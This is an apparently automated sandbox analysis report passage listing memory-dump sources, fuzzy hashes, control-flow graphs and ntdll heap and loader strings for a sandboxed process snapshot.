                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 24caf76b30f6d401a82baa457e52278fc3f3eb57f0bbdc5040eb98d70141b4a4
                                                                            • Instruction ID: 3e60498ea381b3858224f39e4048fee6cf9a28e78c5425b6d386333d1bfdbd15
                                                                            • Opcode Fuzzy Hash: 24caf76b30f6d401a82baa457e52278fc3f3eb57f0bbdc5040eb98d70141b4a4
                                                                            • Instruction Fuzzy Hash: 9790023160651402D500B2584514B0A100587D1201FA5C411B0524538D8B95CA6165A2

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2 1f7e2df0-1f7e2dfc LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 0c7064b2bf613e7000d9c09a11b090a91eb4d69b03a061cb6cb6e99437d08b78
                                                                            • Instruction ID: 67d025a8642439e1b1cffc51e87d4e804de5ea4b08ef50526a343d8b8d02a80d
                                                                            • Opcode Fuzzy Hash: 0c7064b2bf613e7000d9c09a11b090a91eb4d69b03a061cb6cb6e99437d08b78
                                                                            • Instruction Fuzzy Hash: E890023120241413D511B2584504B0B000987D1241FD5C412B0524538D9B56CA62A121

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1 1f7e2c70-1f7e2c7c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 873a6d2238f67b1eea5cdff25ce66779d0feb0bf44249e0ac2a98351fcd4d9a6
                                                                            • Instruction ID: 28c64e20a041e6f65bf591801f0c3ab955e31016c878a25c85e4f3b4fca806a9
                                                                            • Opcode Fuzzy Hash: 873a6d2238f67b1eea5cdff25ce66779d0feb0bf44249e0ac2a98351fcd4d9a6
                                                                            • Instruction Fuzzy Hash: 2890023120249802D510B2588404B4E000587D1301F99C411B4524638D8B95C9A17121

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 1f7e2b60-1f7e2b6c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 219172526b383328a6e8e7c318a2fbbfb71aa1bb8e2dc4767a91f17055146630
                                                                            • Instruction ID: 48c5dc23fdf3924fbe8da2e9af63e335f88f0dd99bed68abf7a75ae7fdb8e133
                                                                            • Opcode Fuzzy Hash: 219172526b383328a6e8e7c318a2fbbfb71aa1bb8e2dc4767a91f17055146630
                                                                            • Instruction Fuzzy Hash: 6C900261203410034505B2584414A1A400A87E1201B95C021F1114570DCA25C9A16125

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 97 1f85fcab-1f85fcc3 GetPEB 98 1f85fcc5-1f85fce0 GetPEB call 1f79b970 97->98 99 1f85fce2-1f85fce3 call 1f79b970 97->99 103 1f85fce8-1f85fd0a call 1f79b970 98->103 99->103 106 1f85fd81-1f85fd8a GetPEB 103->106 107 1f85fd0c 103->107 124 1f85fd8c-1f85fda7 GetPEB call 1f79b970 106->124 125 1f85fda9-1f85fdaa call 1f79b970 106->125 108 1f85fd44-1f85fd49 107->108 109 1f85fd67-1f85fd6c 107->109 110 1f85fd21-1f85fd26 107->110 111 1f85fd60-1f85fd65 107->111 112 1f85fd2f-1f85fd34 107->112 113 1f85fd6e-1f85fd73 107->113 114 1f85fd28-1f85fd2d 107->114 115 1f85fd4b-1f85fd50 107->115 116 1f85fd75-1f85fd7a 107->116 117 1f85fd36-1f85fd3b 107->117 118 1f85fd13-1f85fd18 107->118 119 1f85fd52-1f85fd57 107->119 120 1f85fd3d-1f85fd42 107->120 121 1f85fd7c 107->121 122 1f85fd59-1f85fd5e 107->122 123 1f85fd1a-1f85fd1f 107->123 108->106 109->106 110->106 111->106 112->106 113->106 114->106 115->106 116->106 117->106 118->106 119->106 120->106 121->106 122->106 123->106 128 1f85fdaf-1f85fdca call 1f79b970 124->128 125->128 132 1f85fe0d-1f85fe13 128->132 133 1f85fdcc-1f85fdd5 GetPEB 128->133 136 1f85fe15-1f85fe1e GetPEB 132->136 137 1f85fe56-1f85fe5c 132->137 134 1f85fdf4-1f85fdf5 call 1f79b970 133->134 135 1f85fdd7-1f85fdf2 GetPEB call 1f79b970 133->135 150 1f85fdfa-1f85fe0c call 1f79b970 134->150 135->150 142 1f85fe20-1f85fe3b GetPEB call 1f79b970 136->142 143 1f85fe3d-1f85fe3e call 1f79b970 136->143 138 1f85fe9f-1f85fea5 137->138 139 1f85fe5e-1f85fe67 GetPEB 137->139 144 1f85fea7-1f85fead 138->144 145 1f85feaf-1f85feb8 GetPEB 138->145 148 1f85fe86-1f85fe87 call 1f79b970 139->148 149 1f85fe69-1f85fe84 GetPEB call 1f79b970 139->149 153 1f85fe43-1f85fe55 call 1f79b970 142->153 143->153 144->145 156 1f85fef7-1f85ff00 GetPEB 144->156 157 1f85fed7-1f85fed8 call 1f79b970 145->157 158 1f85feba-1f85fed5 GetPEB call 1f79b970 145->158 167 1f85fe8c-1f85fe9e call 1f79b970 148->167 149->167 150->132 153->137 165 1f85ff02-1f85ff1d GetPEB call 1f79b970 156->165 166 1f85ff1f-1f85ff20 call 1f79b970 156->166 172 1f85fedd-1f85fef4 call 1f79b970 157->172 158->172 174 1f85ff25-1f85ff3a call 1f79b970 165->174 166->174 167->138 172->156
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                            • API String ID: 0-2897834094
                                                                            • Opcode ID: c1a57fe5de8bd6cdf890e3f6729faabdaf6fc5969513e7e13f27f8341c190af5
                                                                            • Instruction ID: e19c482953c50429da37fccf266587f26e644ae1b16c2a822e1547598ba849a5
                                                                            • Opcode Fuzzy Hash: c1a57fe5de8bd6cdf890e3f6729faabdaf6fc5969513e7e13f27f8341c190af5
                                                                            • Instruction Fuzzy Hash: A661C677836254DFCA059F68F8CCE2173E4FB49B30B49819AE8005F371DA35AD91CA85
                                                                            Strings
                                                                            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 1F845A84
                                                                            • LanguageConfigurationPending, xrefs: 1F846221
                                                                            • InstallLanguageFallback, xrefs: 1F846050
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 1F84635D
                                                                            • LanguageConfiguration, xrefs: 1F846420
                                                                            • Control Panel\Desktop, xrefs: 1F84615E
                                                                            • PreferredUILanguages, xrefs: 1F8463D1
                                                                            • @, xrefs: 1F846027
                                                                            • PreferredUILanguagesPending, xrefs: 1F8461D2
                                                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1F845FE1
                                                                            • @, xrefs: 1F8463A0
                                                                            • @, xrefs: 1F84647A
                                                                            • @, xrefs: 1F846277
                                                                            • @, xrefs: 1F8461B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                            • API String ID: 0-1325123933
                                                                            • Opcode ID: 5949eb659c9a853f747d482518f1bd8b9da812f0429b80d3cb110c5afb8a5b53
                                                                            • Instruction ID: ce57591d3b275b953fe39974bc42a3b3a11092ce05a9fc6d5129d480442cf849
                                                                            • Opcode Fuzzy Hash: 5949eb659c9a853f747d482518f1bd8b9da812f0429b80d3cb110c5afb8a5b53
                                                                            • Instruction Fuzzy Hash: 2D7257B55083499BD315CF28C844BABB7E9BFC8704F514A2EF995DB650EB30E805CB62

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1298 1f850274-1f850296 call 1f7f7e54 1301 1f8502b5-1f8502cd call 1f7976b2 1298->1301 1302 1f850298-1f8502b0 RtlDebugPrintTimes 1298->1302 1306 1f8506f7 1301->1306 1307 1f8502d3-1f8502e9 1301->1307 1308 1f850751-1f850760 1302->1308 1311 1f8506fa-1f85074e call 1f850766 1306->1311 1309 1f8502f0-1f8502f2 1307->1309 1310 1f8502eb-1f8502ee 1307->1310 1312 1f8502f3-1f85030a 1309->1312 1310->1312 1311->1308 1314 1f8506b1-1f8506ba GetPEB 1312->1314 1315 1f850310-1f850313 1312->1315 1317 1f8506bc-1f8506d7 GetPEB call 1f79b970 1314->1317 1318 1f8506d9-1f8506de call 1f79b970 1314->1318 1315->1314 1319 1f850319-1f850322 1315->1319 1326 1f8506e3-1f8506f4 call 1f79b970 1317->1326 1318->1326 1323 1f850324-1f85033b call 1f7affb0 1319->1323 1324 1f85033e-1f850351 call 1f850cb5 1319->1324 1323->1324 1333 1f850353-1f85035a 1324->1333 1334 1f85035c-1f850370 call 1f79758f 1324->1334 1326->1306 1333->1334 1337 1f850376-1f850382 GetPEB 1334->1337 1338 1f8505a2-1f8505a7 1334->1338 1339 1f850384-1f850387 1337->1339 1340 1f8503f0-1f8503fb 1337->1340 1338->1311 1341 1f8505ad-1f8505b9 GetPEB 1338->1341 1342 1f8503a6-1f8503ab call 1f79b970 1339->1342 1343 1f850389-1f8503a4 GetPEB call 1f79b970 1339->1343 1346 1f850401-1f850408 1340->1346 1347 1f8504e8-1f8504fa call 1f7b27f0 1340->1347 1344 1f850627-1f850632 1341->1344 1345 1f8505bb-1f8505be 1341->1345 1359 1f8503b0-1f8503d1 call 1f79b970 GetPEB 1342->1359 1343->1359 1344->1311 1348 1f850638-1f850643 1344->1348 1350 1f8505c0-1f8505db GetPEB call 1f79b970 1345->1350 1351 1f8505dd-1f8505e2 call 1f79b970 1345->1351 1346->1347 1354 1f85040e-1f850417 1346->1354 1370 1f850590-1f85059d call 1f8511a4 call 1f850cb5 1347->1370 1371 1f850500-1f850507 1347->1371 1348->1311 1357 1f850649-1f850654 1348->1357 1369 1f8505e7-1f8505fb call 1f79b970 1350->1369 1351->1369 1355 1f850419-1f850429 1354->1355 1356 1f850438-1f85043c 1354->1356 1355->1356 1363 1f85042b-1f850435 call 1f85dac6 1355->1363 1364 1f85044e-1f850454 1356->1364 1365 1f85043e-1f85044c call 1f7d3bc9 1356->1365 1357->1311 1366 1f85065a-1f850663 GetPEB 1357->1366 1359->1347 1391 1f8503d7-1f8503eb 1359->1391 1363->1356 1377 1f850457-1f850460 1364->1377 1365->1377 1374 1f850665-1f850680 GetPEB call 1f79b970 1366->1374 1375 1f850682-1f850687 call 1f79b970 1366->1375 1401 1f8505fe-1f850608 GetPEB 1369->1401 1370->1338 1380 1f850512-1f85051a 1371->1380 1381 1f850509-1f850510 1371->1381 1398 1f85068c-1f8506ac call 1f8486ba call 1f79b970 1374->1398 1375->1398 1389 1f850472-1f850475 1377->1389 1390 1f850462-1f850470 1377->1390 1382 1f85051c-1f85052c 1380->1382 1383 1f850538-1f85053c 1380->1383 1381->1380 1382->1383 1394 1f85052e-1f850533 call 1f85dac6 1382->1394 1395 1f85056c-1f850572 1383->1395 1396 1f85053e-1f850551 call 1f7d3bc9 1383->1396 1399 1f8504e5 1389->1399 1400 1f850477-1f85047e 1389->1400 1390->1389 1391->1347 1394->1383 1407 1f850575-1f85057c 1395->1407 1412 1f850563 1396->1412 1413 1f850553-1f850561 call 1f7cfe99 1396->1413 1398->1401 1399->1347 1400->1399 1406 1f850480-1f85048b 1400->1406 1401->1311 1402 1f85060e-1f850622 1401->1402 1402->1311 1406->1399 1411 1f85048d-1f850496 GetPEB 1406->1411 1407->1370 1410 1f85057e-1f85058e 1407->1410 1410->1370 1415 1f8504b5-1f8504ba call 1f79b970 1411->1415 1416 1f850498-1f8504b3 GetPEB call 1f79b970 1411->1416 1420 1f850566-1f85056a 1412->1420 1413->1420 1423 1f8504bf-1f8504dd call 1f8486ba call 1f79b970 1415->1423 1416->1423 1420->1407 1423->1399
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 3446177414-1700792311
                                                                            • Opcode ID: 8f640d3193eec8c6c24068c8bb8d89fd6884d7d33ed1778b74804bef5e82f65a
                                                                            • Instruction ID: 44d3bcc6d3dd3e1e14ded599ff39019a369d8fd953d7a8060edf6d7c2bbcc18b
                                                                            • Opcode Fuzzy Hash: 8f640d3193eec8c6c24068c8bb8d89fd6884d7d33ed1778b74804bef5e82f65a
                                                                            • Instruction Fuzzy Hash: 26D1BF3591078AEFCB06CF68D844AE9BBF1FF49724F488159E4499F361D735A982CB10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                            • API String ID: 3446177414-3492000579
                                                                            • Opcode ID: a5faedeee29dcd57220f6edc7849d4e9b1921c9ad19f90b64e03807c5f8b4ea2
                                                                            • Instruction ID: 82d902ea841f1829e40faf45098eaa991131b0e5b4d00f1d88a286e4497508df
                                                                            • Opcode Fuzzy Hash: a5faedeee29dcd57220f6edc7849d4e9b1921c9ad19f90b64e03807c5f8b4ea2
                                                                            • Instruction Fuzzy Hash: CE71BF35910689EFCB09CFA8D4847EDFBF2BF89324F148159E4459F291DB36A942CB50
                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 1F7CD959
                                                                              • Part of subcall function 1F7A4859: RtlDebugPrintTimes.NTDLL ref: 1F7A48F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-1975516107
                                                                            • Opcode ID: d90dcdcc164ec3ffcf327cf88c82e1b021d639762064e0cb72867c986aa3f089
                                                                            • Instruction ID: c5691561d311a80769c93c45adaac3914a30df61dd3013edd496b134dd134684
                                                                            • Opcode Fuzzy Hash: d90dcdcc164ec3ffcf327cf88c82e1b021d639762064e0cb72867c986aa3f089
                                                                            • Instruction Fuzzy Hash: D351CD75A043469FDB08CFA4C8A87CDBBF1FB88324F144269D4216B281D776A961CB90
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                            • API String ID: 3446177414-1222099010
                                                                            • Opcode ID: 14d296bbbb54f3565e20a1242161be1a3d1da96b94af7fb5d2699740d71dcb05
                                                                            • Instruction ID: 9175c3c4153e4ac8516b85183b90633a49afe5bb6d7185540fc0791006176210
                                                                            • Opcode Fuzzy Hash: 14d296bbbb54f3565e20a1242161be1a3d1da96b94af7fb5d2699740d71dcb05
                                                                            • Instruction Fuzzy Hash: 543145381247C4EFDB26DB28CC58B9677E4FF05720F048244E8124B6A1CBB9B882C692
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                            • API String ID: 0-2224505338
                                                                            • Opcode ID: bb3a027ad4b0ed8adc5941e8583a2831980dac42a23ced204b7066d76e56a265
                                                                            • Instruction ID: 58f6f0bad2ab53593b79a307908decabd0bb41dfc4bd1126de5e605db4f1eb97
                                                                            • Opcode Fuzzy Hash: bb3a027ad4b0ed8adc5941e8583a2831980dac42a23ced204b7066d76e56a265
                                                                            • Instruction Fuzzy Hash: BD51D33652128CEFCB05CB68EC9DFAA77E5FF09A34F24811AE4019F651D638ED41CA21
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: 42bb4e2ce75f237b4b23084387596e0b3bcf227a35630d4c8a5e268e787f22de
                                                                            • Instruction ID: 15173ff31215a744fa0bc6d03b3b845814831a4957390308730f711768136096
                                                                            • Opcode Fuzzy Hash: 42bb4e2ce75f237b4b23084387596e0b3bcf227a35630d4c8a5e268e787f22de
                                                                            • Instruction Fuzzy Hash: 18F17C74A00646DFDB16CF68C894B6AB7B5FF86304F108269E45A9F391D734F981CBA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 3446177414-3610490719
                                                                            • Opcode ID: a8bbd5535614dcf9e513119264df73aad2eb075768711df6fed840aba0f45e2d
                                                                            • Instruction ID: af2aea84c2fbe1b97ce52bc91fcd8bfc65b497932edd5e8809c965d07082319c
                                                                            • Opcode Fuzzy Hash: a8bbd5535614dcf9e513119264df73aad2eb075768711df6fed840aba0f45e2d
                                                                            • Instruction Fuzzy Hash: 0F91F235714781DFD715DF24E888FAAB7A5FF85B24F000969E8519B380DB34B842C7A2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 3446177414-2283098728
                                                                            • Opcode ID: 9fbe3812327014b080591f2fcabba85ba6639b8aa8f8d74e24348d49b6898695
                                                                            • Instruction ID: 26d088a5d03ff411fc38c3726db1dc43b8050c8225460f0b316d9f03dcd5fab0
                                                                            • Opcode Fuzzy Hash: 9fbe3812327014b080591f2fcabba85ba6639b8aa8f8d74e24348d49b6898695
                                                                            • Instruction Fuzzy Hash: D751DE71604703ABD755DF38D888A69BBF1BBC8314F04062DE8968B290EB35B861CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                            • API String ID: 3446177414-3127649145
                                                                            • Opcode ID: 37bfd559ff7f05132330e73a49ad5953786e5f0b78199ae9e467f2c55d634614
                                                                            • Instruction ID: 1e4bc5a08bec529baad7e802336b277d6c31324f613c37ac6296cf562d62b1be
                                                                            • Opcode Fuzzy Hash: 37bfd559ff7f05132330e73a49ad5953786e5f0b78199ae9e467f2c55d634614
                                                                            • Instruction Fuzzy Hash: 93321A75A017199BDB61CF65CC88B9AF7F8FF48300F5046EAD509AB250EB71AA84CF50
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
